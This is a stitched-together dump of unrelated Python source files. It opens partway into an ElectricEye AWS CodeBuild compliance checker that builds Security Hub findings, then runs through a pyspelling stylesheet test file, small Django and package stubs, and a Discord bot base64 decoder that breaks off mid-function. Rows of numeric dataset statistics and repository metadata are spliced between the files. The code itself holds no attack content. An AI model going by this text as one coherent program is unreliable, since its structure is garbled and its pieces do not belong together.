"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-2",
"NIST SP 800-53 SC-8",
"NIST SP 800-53 SC-11",
"NIST SP 800-53 SC-12",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
"ISO 27001:2013 A.13.1.1",
"ISO 27001:2013 A.13.2.1",
"ISO 27001:2013 A.13.2.3",
"ISO 27001:2013 A.14.1.2",
"ISO 27001:2013 A.14.1.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def plaintext_env_var_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.3] CodeBuild projects should not have plaintext environment variables"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project has any env vars
envVarCheck = str(projects["environment"]["environmentVariables"])
if envVarCheck == "[]":
continue
else:
# loop through env vars
codeBuildEnvVars = projects["environment"]["environmentVariables"]
for envvar in codeBuildEnvVars:
plaintextCheck = str(envvar["type"])
# identify projects that don't use parameter store or AWS secrets manager
if plaintextCheck == "PLAINTEXT":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/plaintext-env-vars",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
"Sensitive Data Identifications",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.3] CodeBuild projects should not have plaintext environment variables",
"Description": "CodeBuild project "
+ buildProjectName
+ " contains plaintext environment variables. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not contain plaintext environment variables refer to the Buildspec File Name and Storage Location section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/plaintext-env-vars",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
"Sensitive Data Identifications",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.3] CodeBuild projects should not have plaintext environment variables",
"Description": "CodeBuild project "
+ buildProjectName
+ " does not contain plaintext environment variables.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not contain plaintext environment variables refer to the Buildspec File Name and Storage Location section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/build-spec-ref.html#build-spec-ref-syntax",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.AC-1",
"NIST SP 800-53 AC-1",
"NIST SP 800-53 AC-2",
"NIST SP 800-53 IA-1",
"NIST SP 800-53 IA-2",
"NIST SP 800-53 IA-3",
"NIST SP 800-53 IA-4",
"NIST SP 800-53 IA-5",
"NIST SP 800-53 IA-6",
"NIST SP 800-53 IA-7",
"NIST SP 800-53 IA-8",
"NIST SP 800-53 IA-9",
"NIST SP 800-53 IA-10",
"NIST SP 800-53 IA-11",
"AICPA TSC CC6.1",
"AICPA TSC CC6.2",
"ISO 27001:2013 A.9.2.1",
"ISO 27001:2013 A.9.2.2",
"ISO 27001:2013 A.9.2.3",
"ISO 27001:2013 A.9.2.4",
"ISO 27001:2013 A.9.2.6",
"ISO 27001:2013 A.9.3.1",
"ISO 27001:2013 A.9.4.2",
"ISO 27001:2013 A.9.4.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def s3_logging_encryption_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.4] CodeBuild projects should not have S3 log encryption disabled"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project disabled s3 log encryption
s3EncryptionCheck = str(projects["logsConfig"]["s3Logs"]["encryptionDisabled"])
if s3EncryptionCheck == "True":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/s3-encryption",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.4] CodeBuild projects should not have S3 log encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has S3 log encryption disabled. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have S3 log encryption disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/s3-encryption",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": [
"Software and Configuration Checks/AWS Security Best Practices",
"Effects/Data Exposure",
],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.4] CodeBuild projects should not have S3 log encryption disabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has S3 log encryption enabled.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have S3 log encryption disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF PR.DS-1",
"NIST SP 800-53 MP-8",
"NIST SP 800-53 SC-12",
"NIST SP 800-53 SC-28",
"AICPA TSC CC6.1",
"ISO 27001:2013 A.8.2.3",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding
@registry.register_check("codebuild")
def cloudwatch_logging_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
"""[CodeBuild.5] CodeBuild projects should have CloudWatch logging enabled"""
project = get_code_build_projects(cache=cache)
myCodeBuildProjects = project.get("projects", [])
for projects in myCodeBuildProjects:
buildProjectName = str(projects["name"])
buildProjectArn = str(projects["arn"])
iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
# check if this project logs to cloudwatch
codeBuildLoggingCheck = str(projects["logsConfig"]["cloudWatchLogs"]["status"])
if codeBuildLoggingCheck != "ENABLED":
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/cloudwatch-logging",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "MEDIUM"},
"Confidence": 99,
"Title": "[CodeBuild.5] CodeBuild projects should have CloudWatch logging enabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has CloudWatch logging disabled. Refer to the remediation instructions if this configuration is not intended",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have CloudWatch logging disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "FAILED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "NEW"},
"RecordState": "ACTIVE",
}
yield finding
else:
finding = {
"SchemaVersion": "2018-10-08",
"Id": buildProjectArn + "/cloudwatch-logging",
"ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
"GeneratorId": buildProjectArn,
"AwsAccountId": awsAccountId,
"Types": ["Software and Configuration Checks/AWS Security Best Practices"],
"FirstObservedAt": iso8601Time,
"CreatedAt": iso8601Time,
"UpdatedAt": iso8601Time,
"Severity": {"Label": "INFORMATIONAL"},
"Confidence": 99,
"Title": "[CodeBuild.5] CodeBuild projects should have CloudWatch logging enabled",
"Description": "CodeBuild project "
+ buildProjectName
+ " has CloudWatch logging enabled.",
"Remediation": {
"Recommendation": {
"Text": "If your project should not have CloudWatch logging disabled refer to #20 in the Change a Build Projects Settings (AWS CLI) section of the AWS CodeBuild User Guide",
"Url": "https://docs.aws.amazon.com/codebuild/latest/userguide/change-project.html#change-project-console",
}
},
"ProductFields": {"Product Name": "ElectricEye"},
"Resources": [
{
"Type": "AwsCodeBuildProject",
"Id": buildProjectArn,
"Partition": "aws",
"Region": awsRegion,
"Details": {"AwsCodeBuildProject": {"Name": buildProjectName}},
}
],
"Compliance": {
"Status": "PASSED",
"RelatedRequirements": [
"NIST CSF DE.AE-3",
"NIST SP 800-53 AU-6",
"NIST SP 800-53 CA-7",
"NIST SP 800-53 IR-4",
"NIST SP 800-53 IR-5",
"NIST SP 800-53 IR-8",
"NIST SP 800-53 SI-4",
"AICPA TSC CC7.2",
"ISO 27001:2013 A.12.4.1",
"ISO 27001:2013 A.16.1.7",
],
},
"Workflow": {"Status": "RESOLVED"},
"RecordState": "ARCHIVED",
}
yield finding | 51.622585 | 203 | 0.467331 | 2,764 | 34,742 | 5.855644 | 0.111795 | 0.02076 | 0.03114 | 0.03806 | 0.872598 | 0.86642 | 0.86333 | 0.860921 | 0.860426 | 0.856781 | 0 | 0.056483 | 0.42925 | 34,742 | 673 | 204 | 51.622585 | 0.759746 | 0.047752 | 0 | 0.832013 | 0 | 0.031696 | 0.376877 | 0.027973 | 0 | 0 | 0 | 0 | 0 | 1 | 0.009509 | false | 0.007924 | 0.004754 | 0 | 0.019017 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a23005892a9619a99d8c537d4a38fdcf9de06cdf | 5,721 | py | Python | tests/filters/test_stylesheets.py | wolf99/pyspelling | 8811d0be2991c6a1f2b3deda752a20c1d889bada | [
"MIT"
] | null | null | null | tests/filters/test_stylesheets.py | wolf99/pyspelling | 8811d0be2991c6a1f2b3deda752a20c1d889bada | [
"MIT"
] | null | null | null | tests/filters/test_stylesheets.py | wolf99/pyspelling | 8811d0be2991c6a1f2b3deda752a20c1d889bada | [
"MIT"
] | null | null | null | """Test stylesheets plugin."""
from .. import util
class TestStylesheetsCSS(util.PluginTestCase):
"""Test stylesheets CSS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: css
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.stylesheets:
stylesheets: css
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_css.yml', config, 'utf-8')
def test_stylesheets_css(self):
"""Test stylesheets CSS."""
bad_words = ['flga', 'graet']
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
p#id.class, p.other_id.class {{
color: white;
}}
"""
).format(
'\n'.join(bad_words + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_css.yml', bad_words)
class TestStylesheetsSCSS(util.PluginTestCase):
"""Test stylesheets SCSS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: scss
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.stylesheets:
stylesheets: scss
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_scss.yml', config, 'utf-8')
def test_stylesheets_scss(self):
"""Test stylesheets SCSS."""
bad_block = ['helo', 'begn']
bad_comments = ['flga', 'graet']
bad_comments2 = ['recieve', 'teh']
bad_words = bad_block + bad_comments + bad_comments2
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
@mixin cover {{
$color: red;
// {}
// {}
@for $i from 1 through 5 {{
&.bg-cover#{{$i}} {{ background-color: adjust-hue($color, 15deg * $i) }}
}}
}}
.wrapper {{ @include cover }}
"""
).format(
'\n'.join(bad_block + good_words),
' '.join(bad_comments + good_words),
' '.join(bad_comments2 + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_scss.yml', bad_words)
class TestStylesheetsSASS(util.PluginTestCase):
"""Test stylesheets SASS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: scss
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.stylesheets:
stylesheets: sass
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_sass.yml', config, 'utf-8')
def test_stylesheets_sass(self):
"""Test stylesheets SASS."""
bad_block = ['helo', 'begn']
bad_comments = ['flga', 'graet']
bad_comments2 = ['recieve', 'teh']
bad_words = bad_block + bad_comments + bad_comments2
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
=cover
$color: red
// {}
// {}
@for $i from 1 through 5
&.bg-cover#{{$i}}
background-color: adjust-hue($color, 15deg * $i)
.wrapper
+cover
"""
).format(
'\n'.join(bad_block + good_words),
' '.join(bad_comments + good_words),
' '.join(bad_comments2 + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_sass.yml', bad_words)
class TestStylesheetsCSSChained(util.PluginTestCase):
"""Test chained stylesheets CSS plugin."""
def setup_fs(self):
"""Setup file system."""
config = self.dedent(
"""
matrix:
- name: css
sources:
- '{}/**/*.txt'
aspell:
lang: en
hunspell:
d: en_US
pipeline:
- pyspelling.filters.text:
- pyspelling.filters.stylesheets:
stylesheets: css
group_comments: true
"""
).format(self.tempdir)
self.mktemp('.stylesheets_css.yml', config, 'utf-8')
def test_stylesheets_css_after_text(self):
"""Test stylesheets CSS."""
bad_words = ['flga', 'graet']
good_words = ['yes', 'word']
template = self.dedent(
"""
/*
{}
*/
p#id.class, p.other_id.class {{
color: white;
}}
"""
).format(
'\n'.join(bad_words + good_words)
)
self.mktemp('test.txt', template, 'utf-8')
self.assert_spellcheck('.stylesheets_css.yml', bad_words)
| 27.771845 | 88 | 0.449747 | 490 | 5,721 | 5.095918 | 0.17551 | 0.072087 | 0.036043 | 0.025631 | 0.845415 | 0.845415 | 0.845415 | 0.820585 | 0.820585 | 0.776532 | 0 | 0.006601 | 0.41741 | 5,721 | 205 | 89 | 27.907317 | 0.742574 | 0.055235 | 0 | 0.746269 | 0 | 0 | 0.121636 | 0.02936 | 0 | 0 | 0 | 0 | 0.059701 | 1 | 0.119403 | false | 0 | 0.014925 | 0 | 0.19403 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a24a2dc42b742ccdbf12588f8cb295913ed98098 | 120 | py | Python | cocoa/views.py | volterra-luo/cocoa | 469e1ed2348c32bd8f9f043b1d673d30d65bd62e | [
"MIT"
] | null | null | null | cocoa/views.py | volterra-luo/cocoa | 469e1ed2348c32bd8f9f043b1d673d30d65bd62e | [
"MIT"
] | null | null | null | cocoa/views.py | volterra-luo/cocoa | 469e1ed2348c32bd8f9f043b1d673d30d65bd62e | [
"MIT"
] | null | null | null | from django.http import HttpResponse
from django.shortcuts import render
def home(request):
return HttpResponse('ok')
| 20 | 36 | 0.808333 | 16 | 120 | 6.0625 | 0.75 | 0.206186 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116667 | 120 | 5 | 37 | 24 | 0.915094 | 0 | 0 | 0 | 0 | 0 | 0.016667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.5 | 0.25 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
a2839a24e8fc775d99a4e9205c383e00e0071d6d | 130 | py | Python | retinopathy/__init__.py | chinmayhegde/retinopathy-detection | 26e23ea24e501a9af21d1145e8c4122fa21fe975 | [
"MIT"
] | null | null | null | retinopathy/__init__.py | chinmayhegde/retinopathy-detection | 26e23ea24e501a9af21d1145e8c4122fa21fe975 | [
"MIT"
] | null | null | null | retinopathy/__init__.py | chinmayhegde/retinopathy-detection | 26e23ea24e501a9af21d1145e8c4122fa21fe975 | [
"MIT"
] | null | null | null | import svm_classifier
import sys
# TODO this is a terrible hack and needs fixed
sys.modules['svm_classifier'] = svm_classifier
| 16.25 | 46 | 0.792308 | 20 | 130 | 5 | 0.7 | 0.39 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 130 | 7 | 47 | 18.571429 | 0.909091 | 0.338462 | 0 | 0 | 0 | 0 | 0.168675 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a2acbf4ee9a4f3ae02444b002f453e4ff34e8333 | 95 | py | Python | venv/Lib/site-packages/nornir_utils/plugins/functions/__init__.py | melihteke/ebook_study | 4848ea42e37ee1d6ec777bfc33f49984653ace34 | [
"MIT"
] | 19 | 2020-04-13T20:35:16.000Z | 2022-03-30T08:04:28.000Z | venv/Lib/site-packages/nornir_utils/plugins/functions/__init__.py | melihteke/ebook_study | 4848ea42e37ee1d6ec777bfc33f49984653ace34 | [
"MIT"
] | 13 | 2020-05-27T16:46:12.000Z | 2022-03-30T11:12:37.000Z | venv/Lib/site-packages/nornir_utils/plugins/functions/__init__.py | melihteke/ebook_study | 4848ea42e37ee1d6ec777bfc33f49984653ace34 | [
"MIT"
] | 11 | 2020-04-27T22:57:08.000Z | 2021-12-20T18:02:04.000Z | from .print_result import print_result, print_title
__all__ = ("print_result", "print_title")
| 23.75 | 51 | 0.789474 | 13 | 95 | 5.076923 | 0.461538 | 0.5 | 0.484848 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 95 | 3 | 52 | 31.666667 | 0.776471 | 0 | 0 | 0 | 0 | 0 | 0.242105 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 1 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 7 |
0c20cdd2bb59eb468c296787d19e190031e7e488 | 366 | py | Python | src/learn/bots/train_all.py | benjaminaaron/GO_DILab | 20630d1a1d513a25de20b2edaeeac097a1b53be4 | [
"MIT"
] | 8 | 2017-10-19T21:21:27.000Z | 2018-01-31T14:36:21.000Z | src/learn/bots/train_all.py | benjaminaaron/GO_DILab | 20630d1a1d513a25de20b2edaeeac097a1b53be4 | [
"MIT"
] | 9 | 2017-10-19T15:28:09.000Z | 2017-12-05T11:42:44.000Z | src/learn/bots/train_all.py | nathanaelbosch/GO_DILab | 20630d1a1d513a25de20b2edaeeac097a1b53be4 | [
"MIT"
] | 1 | 2018-04-23T17:36:35.000Z | 2018-04-23T17:36:35.000Z | """Train all models!"""
from src.learn.bots._32.learn import Learn
Learn().run()
from src.learn.bots._31.learn import Learn
Learn().run()
from src.learn.bots._21.learn import Learn
Learn().run()
from src.learn.bots._22.learn import Learn
Learn().run()
from src.learn.bots._12.learn import Learn
Learn().run()
from src.learn.bots._11.learn import Learn
Learn().run()
| 26.142857 | 42 | 0.743169 | 63 | 366 | 4.222222 | 0.238095 | 0.157895 | 0.270677 | 0.360902 | 0.842105 | 0.75188 | 0.75188 | 0.75188 | 0.75188 | 0 | 0 | 0.036036 | 0.090164 | 366 | 13 | 43 | 28.153846 | 0.762763 | 0.046448 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
a761f0257da0de0908cbd6eb7043f3fa5b9e7388 | 162 | py | Python | xdrawio/arch/arch_level3.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | null | null | null | xdrawio/arch/arch_level3.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | 1 | 2020-05-29T08:41:23.000Z | 2020-05-29T08:41:23.000Z | xdrawio/arch/arch_level3.py | huuhoa/xdrawio | 9d5baaa1c4af539a08095ae4edcce3ed1201267e | [
"MIT"
] | null | null | null | from xdrawio.arch.dataloader import Data
from xdrawio.arch.datatypes import Domain, Group, Page
def generate_layout_spec_level_3(d: Data, page: Page):
pass
| 23.142857 | 54 | 0.790123 | 25 | 162 | 4.96 | 0.72 | 0.177419 | 0.241935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007143 | 0.135802 | 162 | 6 | 55 | 27 | 0.878571 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 8 |
a78287f11158924c6f6e1f9f5d1383a7298001a9 | 6,820 | py | Python | discord_bot/d_commands/codec.py | Mr-Jaxee/Console | 7c042ad51310aaeef76a497a6e96a4ef2a108e6a | [
"MIT"
] | null | null | null | discord_bot/d_commands/codec.py | Mr-Jaxee/Console | 7c042ad51310aaeef76a497a6e96a4ef2a108e6a | [
"MIT"
] | null | null | null | discord_bot/d_commands/codec.py | Mr-Jaxee/Console | 7c042ad51310aaeef76a497a6e96a4ef2a108e6a | [
"MIT"
] | null | null | null | import base64
import binascii
async def decoder(bot, discord, message, botconfig, os, platform, datetime, one_result, localization, embed_color, args, binary, prefix):
if " ".join(args[2:]) == "" or " ".join(args[2:]) == " " or " ".join(args[2:]) == None:
no_args = discord.Embed(title=localization[1][14][0], description=str(localization[1][14][8]).format(prefix), color=embed_color)
return await message.channel.send(embed=no_args)
decoder_content = discord.Embed(title=localization[1][14][0], description=localization[1][14][1] + "\n\n" + localization[1][14][3], color=embed_color)
msg = await message.channel.send(embed=decoder_content)
await msg.add_reaction(emoji="1️⃣")
await msg.add_reaction(emoji="2️⃣")
await msg.add_reaction(emoji="3️⃣")
await msg.add_reaction(emoji="4️⃣")
@bot.event
async def on_reaction_add(reaction, user):
channel = reaction.message.channel
if reaction.emoji == "1️⃣" and user.id != bot.user.id:
try:
result = base64.standard_b64decode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=str(localization[1][14][0]), color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "2️⃣" and user.id != bot.user.id:
try:
result = base64.b32decode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "3️⃣" and user.id != bot.user.id:
try:
result = base64.b16decode(" ".join(args[2:]).encode('ascii')).decode('ascii')
except:
result = localization[1][14][6]
decoder_result_content = discord.Embed(title=localization[1][14][0], color=embed_color)
decoder_result_content.add_field(name=str(localization[1][14][4]), value='```' + str(result) + '```', inline=True)
await msg.edit(embed=decoder_result_content)
if reaction.emoji == "4️⃣" and user.id != bot.user.id:
try:
result = str(binary.decode(" ".join(args[2:])))
except Exception as e:
print(e)
result = localization[1][14][6]
